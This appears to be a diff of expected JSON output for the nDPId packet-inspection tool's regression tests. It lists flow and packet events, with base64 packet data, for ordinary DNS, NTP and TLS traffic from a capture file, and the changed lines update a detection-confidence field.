00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1626168077734,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077734,"pkt":"WNVuaKQA8BiYFWV8CABFAAA0AABAAEAGezbAqAF5jFJxGtKRAbvAP+ze5D7DE4ARCAAudQAAAQEICj3R+WZAyN\/6"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1626168077735,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1626168077735,"pkt":"WNVuaKQA8BiYFWV8CABFAABCGz0AAEARjT3AqAF5CAgICP69ADUALrrFTnABAAABAAAAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAE="} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1626168077749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"thread_ts_msec":1626168077749,"pkt":"8BiYFWV8WNVuaKQACABFAACzStAAAHkRJDkICAgIwKgBeQA1\/r0An7qJTnCBgAABAAYAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAHADAAFAAEAAAR8ABUIdGltZS1vc3gBZwdhYXBsaW1nwB3AMgABAAEAAANFAAQR\/Tb7wDIAAQABAAADRQAEEf1s\/cAyAAEAAQAAA0UABBH9bH3AMgABAAEAAANFAAQR\/TZ7wDIAAQABAAADRQAEEf02fQ=="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168077749,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.54.251"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168077749,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.54.251"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1626168077750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077750,"pkt":"WNVuaKQA8BiYFWV8CABFAABMdJwAAEAR+uvAqAF5Ef02+8BAAHsAOBCpIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} +00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1626168077780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1626168077780,"pkt":"8BiYFWV8WNVuaKQACABFAABMU7FAADcR5NYR\/Tb7wKgBeQB7wEAAOB9pJAED6wAAAAAAAAALU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mN1Ssd5+SX2Y3VLRfJ"} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAABTEkpAADAGeM2MUnEawKgBeQG70pHkPsMTwD\/s34AYAEWx6wAAAQEICkDJEb890flmFQMDABpqQiSe8lZWsEgoTupah5UnGMUqJn8V431Q+A=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1626168077848,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1626168077848,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1626168077848,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAAA0EktAADAGeOuMUnEawKgBeQG70pHkPsMywD\/s34ARAEUESgAAAQEICkDJEcA90flm"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1626168078653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1626168078653,"pkt":"WNVuaKQA8BiYFWV8CABFAABGLVcAAEARex\/AqAF5CAgICMseADUAMgvmotEBAAABAAAAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAAB"} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1626168078654,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1626168078654,"pkt":"WNVuaKQA8BiYFWV8CABFAABITn4AAEARWfbAqAF5CAgICMseADUANKzYlN8BAAABAAAAAAAAAjI2AzExMwI4MgMxNDAHaW4tYWRkcgRhcnBhAAAMAAE="} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2aa\/F4bv+FAQEACuIgAAFwMDCRUAAAAAAAAAWfKHBs70qmO4BAxw\/KH76VJthsd+JmhEdw9LbrjkTjI9b3XfM0DMNLKHxmQFc1wZ9+v47IezDEajRVIeCS0iuwLsGsA3YBgKp65J4M20GnYw3QEoWxPt99213+KI1CclXQzaueofFw\/qIILvmneWSh5sBJstqbtZLD2cDfq2tFoUseLZtuSKYL5M6qSNwvarEAmysHZgT7Udi\/a0Qp07Np4WgFkq\/a9MQH22ift7VaKutQa0mJmP19SdWXTILAVbvhO3J6cdL9EqjePIeIkXKca0uVG2cDnC+ogcIBgWiBVq1pQlzG6pgHKD3PRA0vNoda3MJ0atx621R\/WKvfMZJYbQztqn6MP4oCdEaJloUS59wJjijiLCZEHV1oirlnS2nC0LRIMkV0xOr2eStcvbZVXw4nOKDQS6H4Zgv11KltQC1JnlZF3H2hfUzks7VZJ1piCl7JLEyNiXPboWZlWGmZoEaDAEUa\/zJI4IEULQtYV9J4jBVG0LIyT8dLpi5cgu5HSsaKdQTef+rQO01UnLW77pUjM2FuWnb+vOmbNg9vroOAp08oUd4WURirzl+3HYtCcfBI3wOCJwEWivMjawTzc9kqNg6MLXXDVodJ+9u6ySbjGo8wdF8Ujzicfc0DHPbSwSWwzi48Lx1Xv3zlCdNcfYFQi2USvaYTxC82pbJFTcLcjA75y5d4uDzJFLRDQQPcLYiW1zyuRecgn4v\/HoR\/nQn8q3KO2aunXtZjN2Sgwqa9bCj+P70uuLOr7LdCSf95Yuvv83BVkjI8LO\/K2GelZusfiw+ph2AM5v3nVCVFtVClMHt5LBbn90AGigLyLssV8usgvMte9WY2YO5RbaLrRuaQaZXq7xKP6I9rbLNl04xmGTkSwgMCnsYgpwvWgoxVEJKIK81LOzdRyjEIzviQKsdu5zYpaTUYn0gMWLbk8gisL6HsaNyyzZRZny4WG9c8rHaQ0AVF7OZHAfugm1G0Ya+4uTEO06lH0Y0luTPeZbk6BzWyTQN4kkdYJgzbQ\/H4fL96wAxDKYsoN4xb\/dNiL+rBxozbwW3E3YDpgsLBHEYXx\/9T+ZZByNcVhoanUoyeZR4La0nznczRNl0BSSAwop3ffF\/3weBpuyebCHd3nQY06YIOyKfw5o\/8+DIvbWrrftOtndpCOAfM8xK0ncs0qGgNDeHWSGhfqOCu4xsd1D6TNFpi+SoFxZbO162qCP1uQZqSIk3sB4T700Vag3Fmr5zAc2+Cy2sdC\/A9S2zr73WQ2tNqbvUTsm7mAOCy6fHXiJfrCMOm070Q3x\/hDA1F\/ri24teJTcz681Tpyzz98or8aBXhC1tirmfRKLeb1za5S0A5FpvCOErLaYZ7JnA2Hcnep7W9VvnkzVZD\/eh5PJxQTtMHNN3t73y3SocpYzsv4jecsMhINyJMQzKIZyFN7BeOFn3Icd72v79IVYW+OEMLTFGr\/z0a3l6KHAUNHg5OrTZy63kxeuj2oqpuTuGGW5OGR1vga0lB9LeT5DNs1fw4ET+3+xHSDQYEpIQCm73rmKpEzHnGvP6PaZFc3upw\/YvkfAML3GBWjg6BeNxYGhLgBq1U7bw1AAqe3KjEtHWznkCRp0j2b1yA1x473SNIk\/Tl0OU2uF4V2zDlzbygL3UGekyceZ9TOivgWvNEFgm3JDyB1JsgPkE1UA9Mb3RcUv6IS4oUKckZLMvYCqsp6JNk+hSM2SSYrjCpjVhAAYR\/Tw9J3qPbVuQ\/+0boJNNW9SXU3FXb1mu6\/UjowIaOU5yd1Ruw2HgKAG+TcnMQdTBDCV1Fn1s2Gos7GgJFmic+wrwQmUwvry3qcM4QfQn+KkqL+DVzAfZpY3UE5kKkQw09tvvvCnUub+fKLuuHs2xshp8SgWsVHUpe\/eGalaURu9E5+S5ef5NZPTZU4="} 01667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC1Absg2axnF4bv+FAYEAByKgAA8hiRnjTuMaDQEL+CLYj0enfAkHVnXO7nV5IzKiak6sLS6qxgDE4htK9g2bjk3R484+O\/m3LR4RiopAnWolcjfbrpfWVb1lMjRimj35IfoR0InDQcTV+lqM1hnbaRsbPul7kk7yp40mdnMbGeSdokyNlVd+Gc2o9y\/kRGCp\/RqZF8PhlnvFvIilO8yiVaTaBmaNQ2c5Ph9+sPKU5aFL1uQpdr\/lZqIfEq2kVgCrdBeDo4qNeeQzKtJNsLVSSXJNaa5EbU9xA4Gcwa59FEb+z5l5k6kMngz8ZNuAlqyaHzifpWW3O+gJvTHlQKGmobQMi8ii1K+B8azR0rME7gHuYp8j9KIa090V1eZVPAqukxBBhYGnGZkUnr+FDlf1ZK\/6jjt\/FM8rQ\/lbeUUBqVgsa+O\/WxUto3U7xUvYDA5nlmX+JiSIl7TX4qI+Ru0aN0Akmto\/YQCR\/ts7jv1DeYAK5L5Yy2Vh6PLRQ4c+Pa\/92Jj4DNdt3iyKVflpKtt14Zke3huw2c2HHz1srDVPgqGpJqA\/eD7864eDOp49Ft0Yeo1yo62XnCO2MSq34SmUewekOqz3llMeY3SFHNG\/SCIEenKOH+ZLswKCtHaL23XWktzPIAvtiPaUe8OQwJHr\/lbrWuPFkD\/U0II2V8NaPz4AVb17oDlmuZOeHOf8JZ5gjU14hPhQ0t944FAWUouPhqgHpug4J7fVHUyJ1W0HeNumJ7723SardKLRg5P7i3J2r6\/9HqflhjXWWoqO31j\/pyOLWOUftD3uTRP8P11Cr3jlNVHTXBld4hude0v33CDpTR\/mf09FhR1Yz1vcA7zHJhk+Hem4vzglb2dTx3BT6MRYPvgUON2zk99ErenQrEGfd6PyJWO5iWwsY0xU8meKY2Jp0LdAk9BxGhy3LU4uTxR4t614VXg7Le3F2XXuKmjbJsQgbVMUYhVkJ6JBcddg15aCLR+YYoWrYgjp+WThS8gLNpJaxaihLqA77pNdcaI187nN+luEpN2fsVBRr1v588oPOg6ugZIMvvQGM\/932ci9FWgh+Egtrp9jWvgwN6C+x\/6Ul9gPKwr35MQ2L88mYUnXuuDGVnTkJ6VTWgAawJ1AxcwiThWo3unPbjvr6pM+jswTV6XOO7V8+41tsMKM1s8WPQI+YtWq8fuv3wgnLtmndqFCNp"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2330,"flow_avg_l4_payload_len":1165,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Outlook","breed":"Acceptable","category":"Email"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"thread_ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53428,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"thread_ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC0AbvnBlzSyo5yyVAQEADxegAAFwMDCRUAAAAAAAAA26eDpJKN0BUxQmpzIi5g3ucuMMDrMgecHX\/CXiINnB6nf8RfrEh6QYh8SapIE51Wk64JXAUrOVrpUS79nUGqzqypD0Bb3GpnKslW+hVNJEAhzXjXlIms0Mdvn6rZf1ZDryhGsMaJdsIsDeqTE7cSjb\/AwDHg30Dyx\/033m2orYnQp+ZJ5N9NWzfNjr1H+vEJ2aGglmYbAeu\/eTtxNNfcP8qqdaUykL6lGIGhgLgYGMo5CMVqPKpBBKbvbUNBzJadRi9LHo18AgSCwBMZ6bHVYJDpuFL7e4MT+bXzL18TYFQOTCQfRi5j7DT1as0nLD6cQ0jKomb4NNz1M1ClcV55CitfGm0nMZU3GHOq9xlAFFOdfaUNUR+\/9UjqZ44ylRWAqJ6YHxWCQdtqMTvizXKZS4+o82xV4TJVbLkhSRuiz2uTEwwVxekQB2DDmh3GiR9Ye6GPUgczN\/oCVDwpIkKENeQcP\/6Pokh8HMAvZ2RSwo+VUg00wRguVh\/w3achjv22jf5I9GRZwEow5WUpfCf8lVnHG9wLFCzsLG1I8WMaT0TDTKmn7QoYLtSk2V04tAybQOMHVVI0hNhlfUXhSh+SCshPM17AY0UkKtRYcOa2eStGarsU2t5cfO840a2F+oCsIGDj3tvdR13INFmb7pHkKy+Q2V+4uyAMl+Ox8g+B18vuMUBFtZgxt4DO0uuOzFmplvXLtxD3fbrKuxl\/6k\/eCJsGdMUgzkQC\/tUwe4V3D4jZHwwQSFFI+17aKc3J7x1BEo6ekzNTJS1+B4LNLTfv+T0lK8gzRlr5u7\/zaM8tfLPPN37K2o1mRMRjA5iIukpvT8U5wOf5x\/TVVVdMA8FAaqdY6hLNRSvAFVtu5XaBHOcfP3sb1XSB1z4GRcUCgiJxv+lQFekTDU9BS5oGQCQcC+WphKRrfjCRy8ZZhWK9J\/fFGeUgxNdNGE